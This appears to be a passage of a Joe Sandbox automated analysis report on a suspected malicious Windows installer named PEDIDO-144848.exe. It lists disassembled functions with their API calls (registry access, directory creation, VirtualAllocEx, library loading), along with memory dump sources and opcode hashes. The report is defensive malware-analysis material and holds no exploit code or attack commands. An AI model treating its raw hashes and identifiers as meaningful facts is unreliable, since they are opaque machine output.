                                                        • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                        • String ID:
                                                        • API String ID: 2987980305-0
                                                        • Opcode ID: dcd88b9650ca2fc532c8c5fc9ad8650594621bf6dfbf7b98fc17d5296bd1316f
                                                        • Instruction ID: 6acd92e4f6ebcd949653744c87f359efbc1ef98484dd96508818b65b31ed9250
                                                        • Opcode Fuzzy Hash: dcd88b9650ca2fc532c8c5fc9ad8650594621bf6dfbf7b98fc17d5296bd1316f
                                                        • Instruction Fuzzy Hash: 5921F671E00225EBDF307FA48F48AAE7A706B45354F20023BF701B22D1C6BE4A42D65E
                                                        Function 004015BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 004058AB: CharNextA.USER32(?,?,C:\,?,00405917,C:\,C:\,758B3410,?,C:\Users\user\AppData\Local\Temp\,00405662,?,758B3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058B9
                                                          • Part of subcall function 004058AB: CharNextA.USER32(00000000), ref: 004058BE
                                                          • Part of subcall function 004058AB: CharNextA.USER32(00000000), ref: 004058D2
                                                        • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                          • Part of subcall function 0040547F: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004054C2
                                                        • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\slavelivets,00000000,00000000,000000F0), ref: 0040163C
                                                        Strings
                                                        • C:\Users\user\slavelivets, xrefs: 00401631
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                        • String ID: C:\Users\user\slavelivets
                                                        • API String ID: 1892508949-1403250623
                                                        • Opcode ID: 180f8dbed9302a858d7acc3d4175b887fc009ffc70d4c8ebc0bf4da9f8c84f7e
                                                        • Instruction ID: f4e9a0c94948f709858838e9eb50a0f2792b4ff72a3a1ac07d5dbe4c8cdc963c
                                                        • Opcode Fuzzy Hash: 180f8dbed9302a858d7acc3d4175b887fc009ffc70d4c8ebc0bf4da9f8c84f7e
                                                        • Instruction Fuzzy Hash: D3112731508052EBDB217BB54D409BF26B09E92324B28457FF8D2B22E2D63D4D43A63F
                                                        Function 00405C87 Relevance: 4.5, APIs: 3, Instructions: 45registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegOpenKeyExA.KERNELBASE(80000002,00405ECC,00000000,00000002,?,00000002,000B4E1D,?,00405ECC,80000002,Software\Microsoft\Windows\CurrentVersion,000B4E1D,Call,00856D95), ref: 00405CB0
                                                        • RegQueryValueExA.KERNELBASE(000B4E1D,?,00000000,00405ECC,000B4E1D,00405ECC), ref: 00405CD1
                                                        • RegCloseKey.KERNELBASE(?), ref: 00405CF2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: CloseOpenQueryValue
                                                        • String ID:
                                                        • API String ID: 3677997916-0
                                                        • Opcode ID: 0c8888e50600bbfc423f29d3e13c34afc4b2d72f1a725d9a4029968a390a76be
                                                        • Instruction ID: a78e2699c87532439836dc2b9ae7a1408ac691edae8af3cd19914ba1cc6957ae
                                                        • Opcode Fuzzy Hash: 0c8888e50600bbfc423f29d3e13c34afc4b2d72f1a725d9a4029968a390a76be
                                                        • Instruction Fuzzy Hash: 9C015A7254420AEFEB128F65EC45EEB3FACEF14354F004436F905A6220D235D964DBA5
                                                        Function 100027E8 Relevance: 3.2, APIs: 2, Instructions: 156memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VirtualAllocEx.KERNELBASE(00000000), ref: 100028A7
                                                        • GetLastError.KERNEL32 ref: 100029AE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115168409337.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000000.00000002.115168379839.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000000.00000002.115168440714.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000000.00000002.115168472087.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_10000000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: AllocErrorLastVirtual
                                                        • String ID:
                                                        • API String ID: 497505419-0
                                                        • Opcode ID: 7af5c486cb8ea8547353861cfd678fbd8d20862330e18d67419e74999799b2ae
                                                        • Instruction ID: 700bf99a33fcd989ee77f819fa46e2371db99389a88ce2eb288524e3b596c0af
                                                        • Opcode Fuzzy Hash: 7af5c486cb8ea8547353861cfd678fbd8d20862330e18d67419e74999799b2ae
                                                        • Instruction Fuzzy Hash: 9751A2BA908214DFFB10DF64DCC674937A4EB443D4F21842AEA08E726DCF34A9808B95
                                                        Function 00402483 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00402BD8: RegOpenKeyExA.KERNELBASE(00000000,0000064F,00000000,00000022,00000000,?,?,?,00402383,00000002), ref: 00402C00
                                                        • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024B3
                                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsk7B73.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040254F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: CloseOpenQueryValue
                                                        • String ID:
                                                        • API String ID: 3677997916-0
                                                        • Opcode ID: 8e26defd033098e931a340efcbebfcd7db4374a64648cb469e792002de33b0c4
                                                        • Instruction ID: 0483b46094dd03155b9d0e3ed9d5b90596ace3d3fa60599072770b53af9213ab
                                                        • Opcode Fuzzy Hash: 8e26defd033098e931a340efcbebfcd7db4374a64648cb469e792002de33b0c4
                                                        • Instruction Fuzzy Hash: 8811E371A05205EFDB20CF60CA985AEBBB4AF00359F20443FE142B72C0D2B84A81DB5A
                                                        Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                        • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: b63ad44f694a207690e677ec35bda8f999f5426b301403e6904e10af90410016
                                                        • Instruction ID: 00097469377630013da62b9f7c31fbdee85021c234e60ac5accdaffcc3ed26dc
                                                        • Opcode Fuzzy Hash: b63ad44f694a207690e677ec35bda8f999f5426b301403e6904e10af90410016
                                                        • Instruction Fuzzy Hash: BE01F4316242209BF7194B389C04B6A3698E751354F10813BF811F62F1D678DC028B4D
                                                        Function 00402377 Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00402BD8: RegOpenKeyExA.KERNELBASE(00000000,0000064F,00000000,00000022,00000000,?,?,?,00402383,00000002), ref: 00402C00
                                                        • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033,00000002), ref: 00402396
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0040239F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: CloseDeleteOpenValue
                                                        • String ID:
                                                        • API String ID: 849931509-0
                                                        • Opcode ID: c3c705181fe5658603166456b70eb915c97a04fc9575d71e791babf096fcf5eb
                                                        • Instruction ID: 60c1e4243d723511b4c64426b25872ec533dbc6a778a8c73d92c97a5d2103592
                                                        • Opcode Fuzzy Hash: c3c705181fe5658603166456b70eb915c97a04fc9575d71e791babf096fcf5eb
                                                        • Instruction Fuzzy Hash: 37F0A472A00111ABD710AFA09A8E9BE72A89B40344F24043BF201B71C0D5BD5D019769
                                                        Function 00401A1E Relevance: 3.0, APIs: 2, Instructions: 30stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00000400,00000001), ref: 00401A31
                                                        • lstrcmpA.KERNEL32(?,?,?,00000400,00000001), ref: 00401A44
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: EnvironmentExpandStringslstrcmp
                                                        • String ID:
                                                        • API String ID: 1938659011-0
                                                        • Opcode ID: e8d900abad3d3f7b08a48ee3306f5f417189d62f9577d7b4a96c9798fa742101
                                                        • Instruction ID: 4f813d77772bd54bf890c65dc17d1f1cff84f8c3aa104cf5f65d7bfaad8725e5
                                                        • Opcode Fuzzy Hash: e8d900abad3d3f7b08a48ee3306f5f417189d62f9577d7b4a96c9798fa742101
                                                        • Instruction Fuzzy Hash: 3BF08231B05241EBCB20DF659D45A9A7FE8EFD1394B10843BE145F6190D2388541DA69
                                                        Function 00406139 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleA.KERNEL32(?,?,?,004031EA,00000009), ref: 0040614B
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00406166
                                                          • Part of subcall function 004060CB: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004060E2
                                                          • Part of subcall function 004060CB: wsprintfA.USER32 ref: 0040611B
                                                          • Part of subcall function 004060CB: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040612F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                        • String ID:
                                                        • API String ID: 2547128583-0
                                                        • Opcode ID: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
                                                        • Instruction ID: 8cdf97aa15b56aed8909a69d1313546704d2aaf6dd9f7bed8459987902a8e277
                                                        • Opcode Fuzzy Hash: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
                                                        • Instruction Fuzzy Hash: EFE08632608111AAD31067705E0493B73B89A84710302083EF506F6292D7389C2196A9
                                                        Function 00405A13 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileAttributesA.KERNELBASE(?,00402D3A,C:\Users\user\Desktop\PEDIDO-144848.exe,80000000,?), ref: 00405A17
                                                        • CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405A39
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: File$AttributesCreate
                                                        • String ID:
                                                        • API String ID: 415043291-0
                                                        • Opcode ID: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
                                                        • Instruction ID: 2848333a8a5b20597e43067d17cc290ce391feab13c7f73248cb22e1b8f9cacf
                                                        • Opcode Fuzzy Hash: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
                                                        • Instruction Fuzzy Hash: 5CD09E31658301AFEF098F20DD16F2EBAA2EB84B01F10962CBA82950E0D6755C159B26
                                                        Function 004054FC Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateDirectoryA.KERNELBASE(?,00000000,00403173,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403370), ref: 00405502
                                                        • GetLastError.KERNEL32 ref: 00405510
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: CreateDirectoryErrorLast
                                                        • String ID:
                                                        • API String ID: 1375471231-0
                                                        • Opcode ID: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
                                                        • Instruction ID: 104873d821a1170e2273ca40e0eecd38832efcbc0b1179f41fab49dbd7078dd9
                                                        • Opcode Fuzzy Hash: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
                                                        • Instruction Fuzzy Hash: 23C04C70629501FBDA106B209E097177D55AB90745F1049766106E20F4DA749451D92E
                                                        Function 004025D7 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
